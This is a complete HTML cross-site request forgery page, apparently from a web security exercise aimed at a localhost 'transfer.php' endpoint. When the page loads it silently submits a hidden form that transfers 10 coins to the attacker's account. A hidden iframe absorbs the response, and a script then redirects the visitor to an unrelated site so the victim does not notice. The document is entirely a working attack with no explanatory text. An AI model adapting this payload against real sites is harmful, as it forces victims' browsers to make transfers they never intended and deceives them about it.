<html>
    <head>
    </head>
    <body>
    <iframe style="visibility:hidden; display:none" name=hiddenframe></iframe>
        <form method="POST" name=transferform action="http://localhost/transfer.php" target="hiddenframe">
            <input name=coins value="10" type=hidden>
            <input name=recipient value="you" type=hidden>
            <input name=submission value="Send" type=hidden>
        </form>
        <script>
        document.transferform.submit();
        setTimeout(function () {
            location.assign('http://yesimparanoid.com');
        }, 200);
        </script>
    </body>
</html>
